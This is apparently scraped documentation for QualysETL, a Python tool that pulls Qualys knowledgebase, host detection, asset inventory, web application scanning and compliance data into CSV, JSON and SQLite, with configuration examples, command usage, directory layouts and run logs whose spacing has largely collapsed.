Questions.(qetl_venv)qualysetl@ubuntu:~/.local/bin$more/opt/qetl/users/qualysetl/qetl_home/config/etld_config_settings.yaml## This file is generated by qetl_manage_user only on first invocation.# File generated by qetl_manage_user on: 2023-08-09 07:33:00## YAML File of available configuration options for Qualys API Calls and future options.# Ensure you set these configurations:## 1) host_list_detection_concurrency_limit: 2# - Set this to appropriate qualys concurrency limit value after reviewing the# [Qualys Limits Guide] https://www.qualys.com/docs/qualys-api-limits.pdf with your TAM for Questions.# Note: if you exceed the endpoints concurrency limit,# the application will reset the concurrency limit to X-ConcurrencyLimit-Limit - 1## kb_last_modified_after: 'default' # Leave at default. Knowledgebase is auto-incremental# to full knowledgebase.# kb_export_dir: 'default' # Leave at default until future use is developed.# kb_payload_option: 'default' # Leave at default until future use is developed.# kb_distribution_csv_flag: True # True/False Populates qetl_home/data/knowledgebase_distribution_dir## host_list_vm_processed_after: 'default' # Leave at default until future use is developed.# host_list_payload_option: 'default' # Leave at default until future use is developed.# host_list_export_dir: 'default' # Leave at default until future use is developed.# host_list_distribution_csv_flag: True # True/False Populates qetl_home/data/host_list_distribution_dir## host_list_detection_payload_option: 'default' # Leave at default until future use is developed.# host_list_detection_export_dir: 'default' # Leave at default until future use is developed.# host_list_detection_vm_processed_after: 'default' # Leave at default until future use is developed.# host_list_detection_concurrency_limit: 2 # Reset based on your subscription api concurrency limits# host_list_detection_multi_proc_batch_size: 500 # Leave at 500# host_list_detection_distribution_csv_flag: True # True/False Populates qetl_home/data/host_list_detection_distribution_dir## asset_inventory_payload_option: 'default' # Leave at 'default' until future use is developed.# asset_inventory_export_dir: 'default' # Leave at 'default' until future use is developed.# asset_inventory_asset_last_updated: 'default' # Leave at 'default' until future use is developed.# asset_inventory_distribution_csv_flag: True # True/False Populates qetl_home/data/asset_inventory_distribution_dir## requests_module_tls_verify_status: True # Recommend leaving at True to protect application against# man-in-middle attacks. False will set Python3 requests module# verify option to False and requests will accept any TLS# certificate presented by the server, and will ignore hostname# mismatches and/or expired certificates, which will make your# application vulnerable to man-in-the-middle (MitM) attacks# This option is useful for development testing only when you# are behind a reverse proxy, ex. Data Loss Prevention solution,# and you haven't installed the trusted certificates yet.# was_distribution_csv_flag: True # True/False Populates qetl_home/data/was_distribution_dirrequests_module_tls_verify_status:True\n\nkb_last_modified_after:'default'kb_export_dir:'default'kb_payload_option:'default'kb_distribution_csv_flag:True\n\nhost_list_vm_processed_after:'default'host_list_export_dir:'default'host_list_distribution_csv_flag:True\n\nhost_list_detection_payload_option:'default'host_list_detection_export_dir:'default'host_list_detection_vm_processed_after:'default'host_list_detection_concurrency_limit:8host_list_detection_multi_proc_batch_size:500host_list_detection_distribution_csv_flag:True\n\nasset_inventory_payload_option:'default'asset_inventory_export_dir:'default'asset_inventory_asset_last_updated:'default'asset_inventory_distribution_csv_flag:True\n\nwas_distribution_csv_flag:TrueETL ExamplesETL KnowledgeBaseKnowledgeBase ETL - Incremental Update to Knowledgebase. CSV, JSON, SQLite are full knowledgebase. XML is incremental.note the knowledgebase will rebuild itself every 30-90 days to ensure gdbm is reorganized.qetl_manage_user-u/opt/qetl/users/quser-eetl_knowledgebaseETL Host ListHost List ETL - Download Host List based on dateif no date is used, Host List will auto increment from last run\n( max LAST_VULN_SCAN_DATETIME ) or if no sqlite database exists\nit download start incremental pull from utc minus 1 day.qetl_manage_user-u/opt/qetl/users/quser-eetl_host_list-d[YYYY-MM-DDThh:mm:ssZ]SeeApplication Manager and Datafor location of your qetl_home directory.ETL Host List DetectionHost List Detection ETL - Includes KnowledgeBase and Host List so do not run ETL Host List or ETL KnowledgeBase while Host List Detection ETL is runnning..if no date is used, The Host List Driver will auto increment from last run\n( max LAST_VULN_SCAN_DATETIME ) or if no sqlite database exists\nit download start incremental pull from utc minus 1 day.qetl_manage_user-u/opt/qetl/users/quser-eetl_host_list_detection-d[YYYY-MM-DDThh:mm:ssZ]ETL Asset InventoryAsset Inventory (GAV/CSAM API) ETL - Includes CyberSecurity Asset Inventory API (CSAM) or its subset Global Asset View API (GAV).if no date is used, The Asset Inventory will be pulled from UTC - one day.qetl_manage_user-u/opt/qetl/users/quser-eetl_asset_inventory-d[YYYY-MM-DDThh:mm:ssZ]ETL Web Application Scanning DataWeb Application Scanning (WAS API) ETL - Includes Web Applications, Web Application Findings and the Web Application Catalog.qetl_manage_user-u/opt/qetl/users/quser-eetl_was-d[YYYY-MM-DDThh:mm:ssZ]ETL Policy Compliance PCRSPolicy Compliance (PCRS API) ETL - Includes Policy, Host, and Posture Information for your host assets.qetl_manage_user-u/opt/qetl/users/quser-eetl_pcrs-d[YYYY-MM-DDThh:mm:ssZ]ETL Test SystemTest System ETL - Small system test to validate modules are all working.log/test_system.log will contain all results.Executes Programs:etl_knowledgebase - updates knowledgebase up to date.etl_host_list ( 75 hosts )etl_host_list_detection ( 75 hosts )etl_asset_inventory ( 900 hosts )etl_was ( subset of applications )etl_pcrs ( subset of applications )qetl_manage_user-u/opt/qetl/users/quser-eetl_test_systemApplication Manager and Dataqetl_manage_user applicationqetl_manage_user is your entry point to manage ETL of Qualys data.Host List Detection SQLite Databaseqetl_manage_user -u [userdir] -e etl_host_list_detection -d [datetime] - Resulting sqlite database ready for distribution.EnvironmentPython virtual environmentManaged by qetl_manage_userExample options for qetl Home Directories:Prod: /opt/qetl/users/[user_name]/qetl_homeTest: /usr/local/test/opt/qetl/users/[user_name]/qetl_homeDev: $HOME/opt/qetl/users/[user_name]/qetl_homeApplication DirectoriesPathDescriptionopt/qetl/users/Directory of All Usersopt/qetl/users/[user]/qetl_homeParent directory path for a user[user]/qetl_homeUser Home Directoryqetl_home/binUser bin directory for customer to host scripts they create.qetl_home/credCredentials Directoryqetl_home/cred/.etld_lib_credentials.yamlCredentials file in yaml format.qetl_home/cred/.qualys_cookieCookie file used for Qualys session management.qetl_home/configApplication Options Configuration Directoryqetl_home/config/etld_lib_config_settings.yamlApplication Optionsqetl_home/logLogs - Directory of all run logsqetl_home/log/kb.logLOG KnowledgeBase Run Logsqetl_home/log/host_list.logLOG - Host List Run Logsqetl_home/log/host_list_detection.logLOG - Host List Detection Run Logsqetl_home/log/asset_inventory.logLOG - GAV/CSAM Asset Inventory Run Logsqetl_home/log/was.logLOG - Web Application Scanning(WAS) Run Logsqetl_home/log/pcrs.logLOG - PCRS API Run Logsqetl_home/dataApplication Data - Directory containing all csv, xml, json, sqlite database data.qetl_home/data/kb_sqlite.dbDatabase - Cumulative Knowledgebase SQLite Databaseqetl_home/data/host_list_sqlite.dbDatabase - vm_last_processed Host List SQLite Databaseqetl_home/data/host_list_detection_sqlite.dbDatabase - vm_last_processed Host List Detection SQLite Databaseqetl_home/data/asset_inventory_sqlite.dbDatabase -lastScanDate Asset Inventory SQLite Databaseqetl_home/data/was_sqlite.dbDatabase - WebApp lastScan.date SQLite Databaseqetl_home/data/pcrs_sqlite.dbDatabase - PCRS SQLite Databaseqetl_home/data/knowledgebase_extract_dirExtract - latest *.json.gz, *.xml.gz filesqetl_home/data/host_list_extract_dirExtract - latest *.json.gz, *.xml.gz filesqetl_home/data/host_list_detection_extract_dirExtract - vm_last_processed Host List Detection XML Data Dirqetl_home/data/asset_inventory_extract_dirExtract - Asset Inventory Extracts of last scan date of asset in JSON Format.qetl_home/data/was_extract_dirExtract - Web Application Scanning (WAS) JSON Data Dirqetl_home/data/pcrs_extract_dirExtract - PCRS JSON Data Dirqetl_home/data/knowledgebase_distribution_dirDistribution - latest *.csv.gz files if option set in etld_config.settings.yamlqetl_home/data/host_list_distribution_dirDistribution - latest *.csv.gz files if option set in etld_config.settings.yamlqetl_home/data/host_list_detection_distribution_dirDistribution - latest *.csv.gz files if option set in etld_config.settings.yamlqetl_home/data/asset_inventory_distribution_dirDistribution - latest *.csv.gz files if option set in etld_config.settings.yamlqetl_home/data/was_distribution_dirDistribution - latest *.csv.gz files if option set in etld_config.settings.yamlqetl_home/data/pcrs_distribution_dirDistribution - latest *.csv.gz files if option set in etld_config.settings.yamlData FormatsData Formats created in qetl_home/data:FormatDescriptionJSONJava Script Object Notationuseful for transfer of data between systemsCSVComma Separated Valuesuseful for transfer of data between systemsFormatted to help import data into various BI or Database Tools: Excel, Apache Open Office, Libre Office, Tableau, Microsoft PowerBI, SQL Database LoaderXMLExtensible Markup Languageuseful for transfer of data between systemsSQLite DatabaseSQLite Database: SQLite Database populated with Qualys data, Useful as a self-contained SQL Database of Qualys data for Analysis, Useful as an intermediary transformation into your overall Enterprise ETL Process, SQLite is an in-process library that implements a self-contained, serverless, zero-configuration, transactional SQL database engineLoggingLogging fields are pipe delimited with some formatting for raw readability. You can easily import this data into excel,\na database for analysis or link this data to a monitoring system.FormatDescriptionYYYY-MM-DD hh:mm:ss,msUTC Date and Time. UTC is used to match internal date and time within Qualys data.Logging LevelINFO, ERROR, WARNING, etc. Logging levels can be used for troubleshooting or remote monitoring for ERROR/WARNING log entries.Module Name: YYYYMMDDHHMMSSTop Level qetl Application Module Name that is executing, along with date to uniquely identify all log entries associated with that job.User NameOperating System User executing this application.Function Nameqetl Application Function Executing.Messageqetl Application Messages describing actions, providing data.SeeApplication Directoriesfor details of each log file.cdqetl_home/log\nhead-3kb.log(qetl_venv)qualysetl@ubuntu:/opt/qetl/qetl_venv/bin$cat/opt/qetl/users/qualys_user/qetl_home/log/kb.log|nl12021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|LOGGINGSUCCESSFULLYSETUPFORSTREAMING22021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|PROGRAM:['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase']32021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|check_python_version|Pythonversionfoundis:['3.8.5 (default, Jan 27 2021, 15:41:15) ','[GCC 9.3.0]']42021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|get_sqlite_version|SQLiteversionfoundis:3.31.1.52021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|parentqetlcodedir-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packagesApplication MonitoringTo monitor the application for issues, the logging format includes a logging level.Monitoring for ERROR will help identify issues and tend to the overall health of the applicaiton operation.Securing Your Application in the Data CenterFollow your corporate procedures for securing your application. A key recommendation is to use a password vault\nor remote invocation method that passes the credentials at run time so the password isn't stored on the system.Password VaultQualysETL provides options to inject credentials at runtime via qetl_manage_user, so your credentials are not stored on disk.qetl_manage_user options to inject credentials at runtime are:-p, --prompt-credentials prompt user for credentials, also accepts stdin with credentials piped to program.-m, --memory-credentials get credentials from environment: q_username, q_password, q_api_fqdn_server-s, --stdin-credentials send credentials in json to stdin.\nExample:\n{\"q_username\": \"your userid\", \"q_password\": \"your password\", \"q_api_fqdn_server\": \"api fqdn\", \"q_gateway_fqdn_server\": \"gateway api fqdn\"}Qualys recommends customers move to a password vault of their choosing to operate this applications credentials.\nBy creating functions to obtain credentials from your corporations password vault, you can improve\nthe security of your application by separating the password from the machine, injecting the credentials at runtime.One way customers can do this is through a work load management solution, where the external work load management\nsystem ( Ex. Autosys ) schedules jobs injecting the required credentials to QualysETL application at runtime. This eliminates\nthe need to store credentials locally on your system.If you are unfamiliar with password vaults, here is one example from Hashicorp.Hashicorp Products VaultHashicorp Getting StartedExample Run LogsUninstall Run LogMake sure you are not in your Python Virtual Environment when running uninstall.Notice the command prompt does not include (qetl_env). That means you have deactivated the Python3 Virtual Environment(qetl_venv)qualysetl@ubuntu:~$deactivate\n\nqualysetl@ubuntu:~/.local/bin$python3-mpipuninstallqualysetl\nFoundexistinginstallation:qualysetl0.6.30\nUninstallingqualysetl-0.6.30:Wouldremove:/home/dgregory/.local/bin/qetl_setup_python_venv/home/dgregory/.local/lib/python3.8/site-packages/qualys_etl/*/home/dgregory/.local/lib/python3.8/site-packages/qualysetl-0.6.30.dist-info/*\nProceed(y/n)?ySuccessfullyuninstalledqualysetl-0.6.30\nqualysetl@ubuntu:~/.local/bin$Install Run LogMake sure you are not in your Python Virtual Environment when installing this software.Notice the command prompt does not include (qetl_env).(qetl_env)qualysetl@ubuntu:~$deactivate\nqualysetl@ubuntu:~$python3-mpipinstallqualysetl\nCollectingqualysetlDownloadingqualysetl-0.6.30-py3-none-any.whl(79kB)|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588|79kB1.8MB/sInstallingcollectedpackages:qualysetl\nSuccessfullyinstalledqualysetl-0.6.30\nqualysetl@ubuntu:~$qetl_setup_python_env Run Logqualysetl@ubuntu:~/.local/bin$./qetl_setup_python_venv/opt/qetl\nStartqetl_setup_python_venv-FriJan2107:07:22PST20221)test_os_for_required_commands2)test_for_pip_connectivity3)prepare_opt_qetl_env_dirsusage:qetl_setup_python_venv[/opt/qetl][test|prod][versionnumber]qetl_setup_python_venv[-h]forhelpdescription:Createapython3virtualenvironmentandinstallthequalysetlapplicationintothatenvironmentforusage.Thisisolatesthequalysetlapplicationdependenciestothepython3virtualenvironment.Seehttps://pypi.org/project/qualysetl/forfirsttimesetupandinstallationinstructions.options:qetl_setup_python_venv[/opt/qetl][test|prod][versionnumber]1)[/opt/qetl]-rootdirectorywhereapplicationanddatawillbestored.-Youmustberoottocreatethisdirectory.-Seehttps://pypi.org/project/qualysetl/forfirsttimesetup/installationinstructions.2)[test|prod]-obtainQualysETLfromtestorprodpypiinstance.3)[versionnumber]-obtainversionnumberofqualysetl.examples:1)qetl_setup_python_venv/opt/qetl-Ensureyouhave/opt/qetldirectorycreatedbeforerunningthisprogram.-CreatesQualysETLEnvironment.Seedirectoryinformationbelow.2)qetl_setup_python_venv/opt/qetlprod0.6.131-willinstallversion0.6.131ofqualysetlfrompypi.orgintoyour/opt/qetl/qetl_venvdirectory.3)qetl_setup_python_venv/opt/qetltest0.6.131-willinstallversion0.6.131ofqualysetlfromtest.pypi.orgintoyour/opt/qetl/qetl_venvdirectory.directoryinformation:/opt/qetl-rootdirectoryforApplicationandData/opt/qetl/qetl_venv-applicationdirectoryforQualysETLPythonVirtualEnvironment/opt/qetl/users-datadirectorycontainingresultsofQualysETLexecution.files:Seehttps://dg-cafe.github.io/qualysetl/#application-manager-and-datacontainernotes:1)Forcontainerdeployment,exdocker,applicationanddataareseparatedforcontainerdeployment.ContainerApplication-/opt/qetl/qetl_venvshouldinstalledintothecontainerimage.PersistentData-/opt/qetl/usersshouldbemappedtotheunderlyinghostsystemforpersistentstorageofapplicationdata.\n\n\nCreateqetlPythonEnvironment?/opt/qetl/qetl_venvprod:latest\nDoyouwanttocreateyourpython3virtualenvironmentforqetl?(yesorno)yes\n\nok,creatingpython3virtual/opt/qetl/qetl_venv4)create_qetl_python_venv-willrunforabout1-2minutes1PackageVersion2------------------------3boto31.17.974botocore1.20.975certifi2021.5.306chardet4.0.07idna2.108jmespath0.10.09oschmod0.3.1210pip20.0.211pkg-resources0.0.012python-dateutil2.8.113PyYAML5.4.114qualysetl0.6.3515requests2.25.116s3transfer0.4.217setuptools57.0.018six1.16.019urllib31.26.520wheel0.36.221xmltodict0.12.01Name:qualysetl2Version:0.6.353Summary:QualysAPIBestPracticesSeries-ETLBlueprintExampleCodewithinPythonVirtualEnvironment4Home-page:https://dg-cafe.github.io/qualysetl/5Author:DavidGregory6Author-email:dgregory@qualys.com,dave@davidgregory.com7License:Apache8Location:/opt/qetl/qetl_venv/lib/python3.8/site-packages9Requires:10Required-by:Success!Yourpythonvirtualenvironmentforqetlis:/opt/qetl/qetl_venvYourpython3venvseparatesyourbasepythoninstallationfromtheqetlpythonrequirementsandisyourentrytoexecutingtheqetl_manage_userapplication.Yourbaseqetlinstallationhasmovedtoyourpythonvirtualenvironment:/opt/qetl/qetl_venv!!!savethesecommandsastheyareyourentrytoruntheqetlapplication1)source/opt/qetl/qetl_venv/bin/activate2)/opt/qetl/qetl_venv/bin/qetl_manage_user(Yourentrypointtooperatingqualysetl)Nextsteps:Enteryourpython3virtualenvironmentandbegintestingqualysconnectivity.1)source/opt/qetl/qetl_venv/bin/activate2)/opt/qetl/qetl_venv/bin/qetl_manage_user\n\nEndqetl_setup_python_venv-Thu17Jun202108:40:04PMPDT\nqualysetl@ubuntu:~/.local/bin$qetl_manage_userYou can execute qetl_manage_user to see options available. To operate the qetl_manage_user\napplication you'll first enter the python3 virtual environment, then execute qetl_manage_user.(qetl_venv)qualysetl@ubuntu:~/.local/bin$qetl_manage_userusage:qetl_manage_user[-h][-uqetl_USER_HOME_DIR][-eetl_[module]][-evalidate_etl_[module]][-c][-t][-i][-d][-r][-l]CommandtoExtract,TransformandLoadQualysdataintovariousforms(CSV,JSON,SQLITE3DATABASE)optionalarguments:-h,--helpshowthishelpmessageandexit-uHomeDirectoryPath,--qetl_user_home_dirHomedirectoryPathExample:-/opt/qetl/users/q_username-eetl_[module],--execute_etl_[module]executeetlofmodulename.validoptionsare:-eetl_knowledgebase-eetl_host_list-eetl_host_list_detection-eetl_asset_inventory-eetl_was-eetl_pcrs-eetl_test_system(forasmallsystemtestofallETLJobs)-evalidate_etl_[module],--validate_etl_[module][testlastrunofetl_[module]].validoptionsare:-evalidate_etl_knowledgebase-evalidate_etl_host_list-evalidate_etl_host_list_detection-evalidate_etl_asset_inventory-evalidate_etl_was-evalidate_etl_pcrs-evalidate_etl_test_system-dYYMMDDThh:mm:ssZ,--datetimeYYYY-MM-DDThh:mm:ssZUTC.GetAllDataOnorAfterDate.Ex.1970-01-01T00:00:00Zactsasflagtoobtainalldata.-c,--credentialsupdatequalysapiusercredentials:qualysusername,passwordorapi_fqdn_server-t,--testtestqualyscredentials-i,--initialize_userForautomation,createa/opt/qetl/users/[userhome]directorywithoutbeingprompted.-l,--logsdetailedlogssenttostdoutfortestingqualyscredentials-v,--versionHelpandQualysETLversioninformation.-r,--reportbriefreportoftheusersdirectorystructure.-p,--prompt-credentialspromptuserforcredentials,alsoacceptsstdinwithcredentialspipedtoprogram.-m,--memory-credentialsgetcredentialsfromenvironment:Example:q_username=\"your userid\",q_password=yourpassword,q_api_fqdn_server=apifqdn,q_gateway_fqdn_server=gatewayapifqdn-s,--stdin-credentialssendcredentialsinjsontostdin.Example:{\"q_username\":\"your userid\",\"q_password\":\"your password\",\"q_api_fqdn_server\":\"api fqdn\",\"q_gateway_fqdn_server\":\"gateway api fqdn\"}etld_config_settings.yamlnotes:1.ToEnableCSVDistribution,addthefollowingkeystoetld_config_settings.yamlandtoggleon/offthemviaTrueorFalsekb_distribution_csv_flag:True# populates qetl_home/data/knowledgebase_distribution_dirhost_list_distribution_csv_flag:True# populates qetl_home/data/host_list_distribution_dirhost_list_detection_distribution_csv_flag:True# populates qetl_home/data/host_list_detection_distribution_dirasset_inventory_distribution_csv_flag:True# populates qetl_home/data/asset_inventory_distribution_dirwas_distribution_csv_flag:True# populates qetl_home/data/was_distribution_dirThesefilesarepreparedfordatabaseload,testedwithmysql.Noheadersarepresent.ContactyourQualysTAMandscheduleacallwithDavidGregoryifyouneedassistancewiththisoption.qetl_manage_user Add UserTo add a new user, execute qetl_manage_user -u [opt/users/your_new_user]. See example run log below.qualysetl@ubuntu:~$source/opt/qetl/qetl_venv/bin/activate(qetl_venv)qualysetl@ubuntu:~$qetl_manage_userPleaseenter-u[your/opt/qetl/users/userhomedirectorypath]Note:/opt/qetl/users/newuseristherootdirectoryforyourqetluserhomedirectory,enteranewpathincludingtheopt/qetl/users/newuserinthepathyouhaveauthorizationtowriteto.theprefixtoyouruserdirectoryopt/qetl/usersisrequired.Example:1)/opt/qetl/users/newuserusage:qetl_manage_user[-h][-uQETL_USER_HOME_DIR][-eEXECUTE_ETL_MODULE][-dDATETIME][-c][-t][-l][-p][-s][-m][-r]CommandtoExtract,TransformandLoadQualysdataintovariousforms(CSV,JSON,SQLITE3DATABASE)optionalarguments:-h,--helpshowthishelpmessageandexit-uQETL_USER_HOME_DIR,--qetl_user_home_dirQETL_USER_HOME_DIRPleaseenter-uoption-eEXECUTE_ETL_MODULE,--execute_etl_moduleEXECUTE_ETL_MODULEExecuteetl_knowledgebase,etl_host_list,etl_host_list_detection,etl_asset_inventory,etl_was,etl_pcrs,etl_test_system-dDATETIME,--datetimeDATETIMEYYYY-MM-DDThh:mm:ssZUTC.GetAllDataOnorAfterDate.Ex.1970-01-01T00:00:00Zactsasflagtoobtainalldata.-c,--credentialsupdatequalysapiusercredentialsstoredondisk:qualysusername,passwordorapi_fqdn_server-t,--testtestqualyscredentials-l,--logsdetailedlogssenttostdoutfortestqualyscredentials-p,--prompt_credentialspromptuserforcredentials-s,--stdin_credentialsreadstdincredentialsjson{\"q_username\":\"your userid\",\"q_password\":\"your password\",\"q_api_fqdn_server\":\"api fqdn\",\"q_gateway_fqdn_server\":\"gateway api fqdn\"}-m,--memory_credentialsGetcredentialsfromenvironmentvariablesinmemory:q_username,q_password,q_api_fqdn_server,andoptionallyaddq_gateway_fqdn_server.Ex.exportq_username=myuser-r,--reportBriefreportoftheusersdirectorystructure.(qetl_venv)qualysetl@ubuntu:~$qetl_manage_user-u/opt/qetl/users/qqusr_dt4\n\nqetl_user_home_dirdoesnotexist:/opt/qetl/users/qqusr_dt4/qetl_home\nCreatenewqetl_user_home_dir?/opt/qetl/users/qqusr_dt4/qetl_home(yesorno):yes\n\nqetl_user_home_dircreated:/opt/qetl/users/qqusr_dt4/qetl_home\n\n\nCurrentusername:initialuserinconfig:/opt/qetl/users/qqusr_dt4/qetl_home/cred/.etld_cred.yaml\nUpdateQualysusername?(yesorno):yes\nEnternewQualysusername:qqusr_dt4\nCurrentapi_fqdn_server:qualysapi.qualys.com\nUpdateapi_fqdn_server?(yesorno):no\nUpdatepasswordforusername:qqusr_dt4\nUpdatepassword?(yesorno):yes\nEnteryourQualyspassword:\nYouhaveupdatedyourcredentials.QualysUsername:qqusr_dt4Qualysapi_fqdn_server:qualysapi.qualys.com\n\n\nWouldyouliketotestlogin/logoutofQualys?(yesorno):yes\n\nQualysLoginTestforqqusr_dt4atapi_fqdn_server:qualysapi.qualys.com\n\nTestingQualysLoginforqqusr_dt4Succeededatqualysapi.qualys.comwithHTTPSReturnCode:200.\n\nThankyou,exiting.(qetl_venv)qualysetl@ubuntu:~/opt/qetl/qetl_venv/bin$qetl_manage_user ETL KnowledgeBase(qetl_venv)qualysetl@ubuntu:~/opt/qetl/qetl_venv/bin$qetl_manage_user-u/opt/qetl/users/qualys_user-eetl_knowledgebase\nStartingetl_knowledgebase.Forprogressseeyour/opt/qetl/users/qualys_user/qetl_homelogdirectory\nEndetl_knowledgebase.Forprogressseeyour/opt/qetl/users/qualys_user/qetl_homelogdirectory(qetl_venv)qualysetl@ubuntu:~/opt/qetl/qetl_venv/bin$cat/opt/qetl/users/qualys_user/qetl_home/log/kb.log|nl12021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|LOGGINGSUCCESSFULLYSETUPFORSTREAMING22021-05-2801:26:03,836|INFO|etl_knowledgebase:20210528012603|dgregory|setup_logging_stdout|PROGRAM:['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase: 20210528012603']32021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|check_python_version|Pythonversionfoundis:['3.8.5 (default, Jan 27 2021, 15:41:15) ','[GCC 9.3.0]']42021-05-2801:26:03,897|INFO|etl_knowledgebase:20210528012603|dgregory|get_sqlite_version|SQLiteversionfoundis:3.31.1.52021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|parentqetlcodedir-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages62021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|childqetlcodedir-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl72021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_lib-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_lib82021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_templates-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_templates92021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_knowledgebase-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_knowledgebase102021-05-2801:26:03,898|INFO|etl_knowledgebase:20210528012603|dgregory|set_qetl_code_dir|etld_host_list-/home/dgregory/opt/qetl/qetl_venv/lib/python3.8/site-packages/qualys_etl/etld_host_list112021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|parentuserappdir-/opt/qetl/users/qualys_user122021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|userhomedirectory-/opt/qetl/users/qualys_user/qetl_home132021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_root_dir-Userrootdir-/opt/qetl/users142021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_home_dir-qualysuser-/opt/qetl/users/qualys_user/qetl_home152021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_data_dir-xml,json,csv,sqlite-/opt/qetl/users/qualys_user/qetl_home/data162021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_log_dir-logfiles-/opt/qetl/users/qualys_user/qetl_home/log172021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_config_dir-yamlconfiguration-/opt/qetl/users/qualys_user/qetl_home/config182021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_cred_dir-yamlcredentials-/opt/qetl/users/qualys_user/qetl_home/cred192021-05-2801:26:03,900|INFO|etl_knowledgebase:20210528012603|dgregory|setup_user_home_directories|qetl_user_bin_dir-etlscripts-/opt/qetl/users/qualys_user/qetl_home/bin202021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-kb_last_modified_after:default212021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-kb_export_dir:default222021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-host_list_vm_processed_after:default232021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|load_etld_lib_config_settings_yaml|etld_config_settings.yaml-host_list_payload_option:notags242021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_kb_vars|knowledgeBaseconfig-/opt/qetl/users/qualys_user/qetl_home/config/etld_config_settings.yaml252021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_kb_vars|kb_export_dirisdirectfromyaml262021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_kb_vars|kb_last_modified_afterutc.nowminus7days-2021-05-21T00:00:00Z272021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_host_list_vars|hostlistconfig-/opt/qetl/users/qualys_user/qetl_home/config/etld_config_settings.yaml282021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_host_list_vars|host_list_vm_processed_afterutc.nowminus7days-2021-05-27T00:00:00Z292021-05-2801:26:03,902|INFO|etl_knowledgebase:20210528012603|dgregory|setup_host_list_vars|host_list_payload_optionyaml-notags302021-05-2801:26:03,906|INFO|etl_knowledgebase:20210528012603|dgregory|spawn_etl_in_background|JobPID247944kb_etl_workflowjobrunninginbackground.312021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|__start__kb_etl_workflow['/home/dgregory/opt/qetl/qetl_venv/bin/qetl_manage_user','-u','/opt/qetl/users/qualys_user','-e','etl_knowledgebase: 20210528012603']322021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|datadirectory:/opt/qetl/users/qualys_user/qetl_home/data332021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|configfile:/opt/qetl/users/qualys_user/qetl_home/config/etld_config_settings.yaml342021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|credyamlfile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml352021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_start_wrapper|cookiefile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cookie362021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|kb_extract_wrapper|startknowledgebase_extractxmlfromqualyswithkb_last_modified_after=2021-05-21T00:00:00Z372021-05-2801:26:03,907|INFO|etl_knowledgebase:20210528012603|dgregory|knowledgebase_extract|start382021-05-2801:26:03,909|INFO|etl_knowledgebase:20210528012603|dgregory|get_cred|Foundyoursubscriptioncredentialsfile:/opt/qetl/users/qualys_user/qetl_home/cred/.etld_cred.yaml392021-05-2801:26: